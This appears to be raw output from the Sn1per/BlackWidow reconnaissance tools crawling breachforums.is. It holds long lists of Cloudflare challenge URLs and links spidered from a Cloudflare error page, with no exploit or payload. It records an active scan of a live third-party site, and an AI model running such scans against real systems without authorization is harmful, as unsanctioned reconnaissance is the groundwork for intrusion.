https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/619386773:1690157454:_AYkh7_T6_XS3jlD0Gtu0d4LggyW-5wH0842p2RtA9c/7eb81f6e69e8ce80/1edd1bf68406a24
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/642517850:1693292810:RVmTguXoHHGQ8VRLY-qojFJaPXJSbAbVf1He5hqten4/7fe35296faf6d01d/4af4c38bf32d4b8
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/649580181:1693292839:emmnCbbuLFfFKTktyFJIcdCHRswGKyFkmQ0ZjArv6mM/7fe352ca0e6b9645/e29e85d2b6a04d1
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/663482838:1692195767:KIGffnsT6oocrTpqIGDJCkJJvvQ33ODV4z856o54xgY/7f7a78c0dae3cf5d/320d932f4918c79
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/850481710:1693293010:kGhPBG2lcTkm2wHgtRS-yYVrhYjmNN4Y8G9uz7bAWGM/7fe352f48d11f9e0/e655317cd02c5eb
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/894559952:1692195871:qhCeNXCg6dw4fmvqnsagR0DBiTBOXs10krz1yzAFy7g/7f7a7a389f92f947/ce23a2dfad874a6
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/953019649:1693292954:8SxuW0XpN-EU4TPHbA7OESwZWaWWNzzXjnE1DjPu350/7fe3528eadf6fb38/956bfe7271f9dae
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/953019649:1693292954:8SxuW0XpN-EU4TPHbA7OESwZWaWWNzzXjnE1DjPu350/7fe352d1782e9831/a2d650ad9842581
https://breachforums.is/cdn-cgi/challenge-platform/h/b/flow/ov1/993541467:1690157414:Oep7bfbaz4206uhif-9F8XiYOwFHX7QfMCchkX6pPUQ/7eb81f45edb41758/b80de602903a019
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7ee5b8440c22172a
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7ee67e613ccacec1
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7ee67e7b6cff238b
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7eebe2c95dda1748
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7eebe2f87c44cedd
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7eebe33849962512
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7eebe371eb3824fa
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7eebe3d7ab619667
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7f7a78c0dae3cf5d
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7f7a79033e55983a
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7f7a79246b85985a
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7f7a7a221e4c2364
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7f7a7a389f92f947
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7f7a7a59ed77ce84
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7f7a7a947c67cf31
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7fc9a9595ad2159e
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7fe3528eadf6fb38
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7fe35296faf6d01d
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7fe352ca0e6b9645
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7fe352cb990afa86
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7fe352cc7dc9fa4e
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7fe352d1782e9831
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7fe352f48d11f9e0
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7fe353496a76f93d
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7fe3534a9e969644
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=80728ca05f785c18
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=80728ea30ece24dc
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=807290c26a79f9f1
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=80729406fd8f1703
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8072956aff732393
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=808076f57dfa15ba
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/jsch/v1?ray=7eb81f45edb41758
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/jsch/v1?ray=7eb81f6e69e8ce80
https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/jsch/v1?ray=7eb823147fa9158f
https://breachforums.is/cdn-cgi/challenge-platform/h/g/beacon/ov1/1419474528:1692684715:ga3CShYBYhr603c78PIY9BbuwIxc-0M_Kbqlu8dArlk/7fa92652ccd096cb/149675a6182c3d5/non-interactive
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1061884076:1693020131:4dBy-V_mwXdWRbmgCi7-PO_o2GbOU9oyTungt-BVxlY/7fc95a047f3b943a/8e79cf7ffc3676e
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1084049815:1692367717:EsTthl9FVHbqP-S4zM4T0hgObuNBNCNlWjzERG_xe7g/7f8afa110da2f967/4635549b728fec1
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/108881184:1692684582:uJU6Q9oItDsQwZWmD4dYlJ9A0vMefDkZ1SViSecijGI/7fa927bd18cd1566/b35a3ade57ae592
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1089001942:1692497304:huANK75JFrDpNJY6Nr71OXOYWKwWy6mVbw2l0GL3bt0/7f977bcbab32f977/b2bce3e4db0ae8a
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1089744838:1692497347:m3O5qMtm0tXBOVUj6wHk31OhH49YkROmv96cE6hNGwY/7f977c2e589e239d/6a740cbf528dd41
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1091412846:1692897834:1mRPiF8Qf9ZEFDaPKjex_WjIni8VnHuvIKG4LpJK5CA/7fbd88948df7172a/027d20feee7a03f
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1117532803:1692684624:5v0Yrw5Et2jm2eRvo9BN_dzTa-5ZzeDoSnJEpmsGvWA/7fa904f079bf15a2/003aa8901072cae
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1117532803:1692684624:5v0Yrw5Et2jm2eRvo9BN_dzTa-5ZzeDoSnJEpmsGvWA/7fa905220ef0ce74/a564d59034250e8
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1117532803:1692684624:5v0Yrw5Et2jm2eRvo9BN_dzTa-5ZzeDoSnJEpmsGvWA/7fa92a191cc4943e/77272fcb174b872
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1127773067:1692684674:QdFy4lF5WCElLVPsOep79APNqgJw-fMQSCvuHjMfUE8/7fa922b9f98615e9/82ea0f5faadd204
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1127773067:1692684674:QdFy4lF5WCElLVPsOep79APNqgJw-fMQSCvuHjMfUE8/7fa9268679d022a2/10be37a05325e53
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1127773067:1692684674:QdFy4lF5WCElLVPsOep79APNqgJw-fMQSCvuHjMfUE8/7fa9284b390315cc/ec52213e2bb95d6
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1134339892:1690326606:R7Jqqrhg-WjKDkNq_e2HWKUbsxcjchzY-edwIoUAAR4/7ec8454e7ce8ced1/a5a13efa058392b
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1165109279:1692897799:aOV7-f3k50UbopjE2sGKcAaWt1M2EscOY4krVatG-30/7fbd882d09939822/edd1445a6069429
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/122820178:1692601764:ExE5DI5Y7t7c1s1uQBGzKXGG3UFbEH0gsQF6K9jP7rM/7fa13e614999238f/aeaefbdeaf2d094
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1238402232:1692608953:OXz-BUBVdnNbGRbMoxTn2eoYhfOdWYtarG6xSyhbWRQ/7fa2009fffcfcf8b/92db30662a47a72
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1257200448:1692489990:o0KduAdC8lV-WAO1ZqNfwWM_qp2a9Q80Chhab9wekWY/7f9691879c761686/c9309f477514360
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1258585583:1693023757:XEo021GePmSirAEHpxJYAfibL4J2-fMcEZtu2AynKLw/7fc960e43a201668/1e14da4f79ab42a
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1262589431:1692497276:vuMT0QN69aWWRWEz4Z9c-RWtH_B_SL4u6IoLDD8kY5I/7f977bf13c3c15dd/f909b10706ee312
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1300850246:1692684575:XffWYOQ6l87s3mIZDDFxOFzJbpM40RLRu6fJ26-dSEs/7fa91d302e12ce54/f9d0d71a2a6d3c0
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1300850246:1692684575:XffWYOQ6l87s3mIZDDFxOFzJbpM40RLRu6fJ26-dSEs/7fa922579b70f98b/ff67ef849953a78
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1301118843:1692662825:iSHAIzw7MVsSCCdl9aecyA9zxZCJDEPUgjhmbJapedA/7fa71955ea5515bc/bdf670e06b336f0
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1336254697:1692688086:GwPxb1rMfPom_InjN8zc2LT7d9Toowz3aR_Ssl70seI/7fa980109cf71732/295620c839d0d46
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1338614576:1692684720:J85tLlpsiraLbb8LWIl6KoE7HC48rJ9SXfQ-dtk-Mqw/7fa91be94c1bf98f/f45ed0585607c23
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1338614576:1692684720:J85tLlpsiraLbb8LWIl6KoE7HC48rJ9SXfQ-dtk-Mqw/7fa9273c8d73fa3a/b3703c349ae3be0
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1362193755:1692367784:Bp0koxKpi_lxQjmZsFt58ED1gW-kMlIZEZ7K9Fm0OY0/7f8af9dbfcfed005/e2fd0cf00f89cab
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1363267756:1692684638:dqjkf1DOt9n6MkkJ5FBmO4etsRs-2-K3xIsBtb4mFXE/7fa91c23af1196a5/a357fa5f2383612
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1363267756:1692684638:dqjkf1DOt9n6MkkJ5FBmO4etsRs-2-K3xIsBtb4mFXE/7fa91e4a095ece34/a02ef295e2abb96
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1363267756:1692684638:dqjkf1DOt9n6MkkJ5FBmO4etsRs-2-K3xIsBtb4mFXE/7fa9210b6d96fa8a/40068a7992d9b14
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1363267756:1692684638:dqjkf1DOt9n6MkkJ5FBmO4etsRs-2-K3xIsBtb4mFXE/7fa922cec96bcfb4/d02fb83244f427b
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1378909921:1693020124:ljH6P2t8h8xJIMHTXChL3U_6d9Hb-R41B1cnTAprq80/7fc92801af7e9e50/2e7e15af50b8132
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1378909921:1693020124:ljH6P2t8h8xJIMHTXChL3U_6d9Hb-R41B1cnTAprq80/7fc959d17e4f15fb/50fb530fe88b19a
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1381675358:1690308552:ARYRrm448ebBZRLJUYyfBczKB6Xca7JfGqgq8yzrbAk/7ec683fb0fbfcea4/628127a28286c97
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1390418998:1693020046:J-H5jrAUUAOyEoXRJTDhhAT6etAbjgFtQsfFB3y1P28/7fc93a186d4722ae/f80f94682fd9e57
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1395100154:1692497401:FVLGUlLE7bEhsHFRIgFtLM18wClX9WvLqrsmdkiHaLU/7f977bb2ae576441/c1e07d75f80cfc5
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1402532192:1692897779:014h1UDckOKPdHKtzF7LsU17FL3GUIKD36EJOU3iBhg/7fbd86bbfec1f987/00689a38e68582e
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1419474528:1692684715:ga3CShYBYhr603c78PIY9BbuwIxc-0M_Kbqlu8dArlk/7fa9220cd8bff977/6975778e6c26c73
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1419474528:1692684715:ga3CShYBYhr603c78PIY9BbuwIxc-0M_Kbqlu8dArlk/7fa92652ccd096cb/149675a6182c3d5
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1419474528:1692684715:ga3CShYBYhr603c78PIY9BbuwIxc-0M_Kbqlu8dArlk/7fa926a0ccff96e1/57a65cf69d6c352
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1419474528:1692684715:ga3CShYBYhr603c78PIY9BbuwIxc-0M_Kbqlu8dArlk/7fa92a36d88cfaf0/86558893983311c
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1443557146:1692245161:Jxtvnb5vPaeVCHbn8RrY2E9KmZKVaR06-gndG3_JmEA/7f7f36423d1cf9e0/5ab4c947b8fb646
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1471547507:1692245265:wGDNVH7Pl-XQI6aMKjTC4WdLMlwJE9oaZVjHVa5CJm8/7f7f3662d95b172e/475796616543061
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1471547507:1692245265:wGDNVH7Pl-XQI6aMKjTC4WdLMlwJE9oaZVjHVa5CJm8/7f7f36645ce7fa01/e5e9bb74309ebd0
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/148799623:1692245331:uwmEaKONCQGisTk9wRT99AgxiFp8-kjhKJluOgjRF6w/7f7f345b9bf615f9/d78bb43073dec0d
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1499520807:1692680788:E8Gw3B6tXXMV6fy2hCJLQJ6d28d2GgMcFLiKqu6JzHo/7fa904103bd42544/ab0187e3dcc84c4
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1499520807:1692680788:E8Gw3B6tXXMV6fy2hCJLQJ6d28d2GgMcFLiKqu6JzHo/7fa90878392515b8/3aecc7a3df9470a
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1531514825:1692897840:eUWNf7fW6XVuLlT9aRZxr6hlr_dTUY9_6aMLApSZW-g/7fbd86712ff2ce34/8f76b9491e06dfb
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1541117182:1692490032:jFRh8PwYCQSTcTOIJF-peT2KDWzvkdqo9QyJqfHdsXE/7f9698d22c0af99f/5e3d6d40359ae29
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1562382505:1693020149:4vicr8OXfVtDL_3HO_nr0TIH-XaFaYHK1JlHDJvfk_8/7fc90d0a7b7fcea4/5d1ebb5cd9e3147
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1576630504:1692897737:tIJaC-JPYvQPoxLSGCoZlzpuwGz8sS7_cVygvlrdqKE/7fbd875b6ee9d011/65ca74a6c41291a
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1601942260:1692612458:FiEUxzGNzcWt3ZvzRh36SJ5OxEIXbFZNxFrmU7QhxDI/7fa2475afaef9694/7c73cc4ef09980b
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1602533527:1692684561:6ZGT2Z0d6ntDmcsGVhuEs52xc_wba9iThHxLNEqiw6U/7fa904250cb4981c/d522a2299341470
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1626874891:1692684687:nYafBjKOMejBU54OxB_UjHp7lxqAPv4heouo7t-cUlw/7fa92493abeef963/129d2c5b85a234a
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/164799325:1693023784:ebVlS7KP8HrnuFbBfhsvFCKSC9z9jwO5yXaGULeqv5c/7fc960bffc579806/b6155b4c1b3d8ef
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/167203070:1692662852:HzlaDP41FGGlZ7RJVp2b9x8b-CGez-EQ3UJsC4f6Ruc/7fa719903d5ece94/c1f43952a367dd8
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1678784099:1692245188:0EQS2B9lFfJ552XVScpUqYgEaWR22y4j2dctAJdEOuI/7f7f362d4bd9fb38/3b3d62201010dde
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1694940522:1692681000:vVaMB_VszblU28nIf5K-7rD-vNnThqaP2x0LYvDBRTY/7fa905018ef3fa62/a01f3e618a3f757
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1717955863:1692680854:e09BvJ5CXFjSAnAI1CNquNqo3NUGqiY6vmT2INcsFDc/7fa9047eff3a967f/14b424da9fea5cc
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1719771961:1690326617:U-j22M-Xwz2ELqY6Z-DJBX9RSANARcUK66mqQs_MyD4/7ec844a8c8309644/2b5c076af236a2f
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1727667165:1692241681:IAr7jRpXQ5z8BQhhgr9BrK3ZyA7p5FsS6jDMRUHGdP8/7f7f1c1a2ca0234f/3a6efd516165acf
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1735053775:1692680919:CQh5UAClTnXy4Qss_MocgJLmWRE1p8XdPjkw6H866UQ/7fa908872ef91736/715e7a1eedf46d1
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1740977491:1692684726:DH7n3f_88iJB2W9OHY8S11OHpgSmJX4e9ivsJpTfQp4/7fa91c6e0906fade/7f612461b707de9
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1742204268:1694795223:mK6esQDe3D6tH-hFQH4Bqyzv010jpOyAdBu_uLge0rU/80729e559d252519/b64e195e0c46ea1
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1764495139:1692684740:FfwInAxWGRVHi7SS4tKHgrExwP1AcR5Cvxkz5Fzbcxc/7fa91d450838cf19/2f0990aec959137
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1783285080:1692367750:fTaMQE-B-0UQxp65tSIF8vCra31ANUbw5QrRcPG_aEA/7f8af9f0b906270c/41717ca87dc406f
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1804297456:1694795261:srtvcjZ_ncGyLg_BqjxRgJt8tqELhsFziRziTo-j8_Q/8072900dad2b15fb/600d9fe572a03cf
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1807491607:1692684610:M_FY23pJkOOsly9qkONQghUo9sjgr-jxARi8ckwYUII/7fa921269b63d01d/e66320eb3328fdb
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1807491607:1692684610:M_FY23pJkOOsly9qkONQghUo9sjgr-jxARi8ckwYUII/7fa924a04bc4cfc0/4bc7ef6783acaaf
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1807491607:1692684610:M_FY23pJkOOsly9qkONQghUo9sjgr-jxARi8ckwYUII/7fa9282b0b9422a2/23fffa04ec5eb68
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1829702485:1692684754:dZDrIB5wFjgakpHte4LQOjQwOf_Era0LAMAjAla_zFo/7fa91e7ec9ba1754/674e35269ca4382
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1829702485:1692684754:dZDrIB5wFjgakpHte4LQOjQwOf_Era0LAMAjAla_zFo/7fa9248bbac8ce6c/1ed38ee27e820c5
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1829702485:1692684754:dZDrIB5wFjgakpHte4LQOjQwOf_Era0LAMAjAla_zFo/7fa92651a81a24c9/f7c6a58eb0c2347
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/184247199:1692284760:zifxnZfDkoUWbL-aFW-cimxBBVAavpKJAEWL2oIifQY/7f82fb8b28672714/c4533394b3d80d0
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1870685351:1692489925:zaO7WWgzVHJz1mSBlF_qAMefeJn8ymVZz_JhxpT10KM/7f9698b9b9e6251c/c911f8d45914fdd
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1873172762:1690326715:MJb8YBzN0Z_KAqQIOBcQFqPo-fRnfJGScN5yO26kXHw/7ec844645c1b17ec/287163d9452a349
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1881875246:1692489950:8wox0di1wm-ey66PtcF91fO9LCwCm9J2h0ztfZdTAX8/7f9698f4be022700/dfe4e08d504326e
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1925288593:1692245304:MagemM1DCfAKgoViu_BXdDWvb6dIAjXe1v9taCrAgP0/7f7f36f9da139645/7202422cc9a4b05
====================================================================================•x[2023-09-17](21:13)x•
 FETCHING HACKERTARGET URLS 
====================================================================================•x[2023-09-17](21:13)x•
====================================================================================•x[2023-09-17](21:13)x•
 FETCHING GUA URLS 
====================================================================================•x[2023-09-17](21:13)x•
====================================================================================•x[2023-09-17](21:13)x•
 RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN 
====================================================================================•x[2023-09-17](21:13)x•

                                                                                                                    
                _.._                                                                                                
              .'    '.                                                                                              
             /   __   \                                                                                             
          ,  |   ><   |  ,                                                                                          
         . \  \      /  / .                                                                                         
          \_'--`(  )'--'_/                                                                                          
            .--'/()'--.                                                                                             
@xer0dayz  /  /` '' `\  \                                                                                           
             |        |                                                                                             
              \      /                                                                                              
                                                                                                                    
                                                                                                                    
 + -- --=[ https://sn1persecurity.com
 + -- --=[ blackwidow v1.3 by @xer0dayz 


==================================================================================================
https://breachforums.is:8443
==================================================================================================                  
[+] Dynamic URL found! https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is                                                                                                               
[+] Dynamic URL found! https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is                                                                                                               
[+] Dynamic URL found! https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is                                                                                                               
[+] Dynamic URL found! https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is                                                                                                               
__________________________________________________________________________________________________

==================================================================================================
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is
==================================================================================================                  
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//plans/enterprise/contact/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//whats-new/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//plans/enterprise/contact/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//plans/faq/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//plans/enterprise/contact/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//plans/enterprise/contact/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//partners/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//plans/enterprise/contact/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//under-attack-hotline/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//what-is-cloudflare/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//plans/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//plans/enterprise/contact/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//partners/
[i] Telephone # found! +16503198930 
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//analysts/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//plans/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//case-studies/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//resource-hub/
[+] Dynamic URL found! https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//resource-hub/?resourcetype=Webinar                                                                           
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//learning/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//galileo/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//athenian/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//campaigns/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//products/cloudflare-workers/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//integrations/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//trust-hub/technologies/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//gdpr/introduction/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//trust-hub/abuse-approach/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//about-overview/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//diversity-equity-and-inclusion/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//people/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//press/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//careers/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//connect2023/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//logo/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//network/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//privacypolicy/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//website-terms/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//disclosure/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//trademark/
__________________________________________________________________________________________________

==================================================================================================
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is
==================================================================================================                  
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//plans/enterprise/contact/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//whats-new/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//plans/enterprise/contact/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//plans/faq/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//plans/enterprise/contact/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//plans/enterprise/contact/
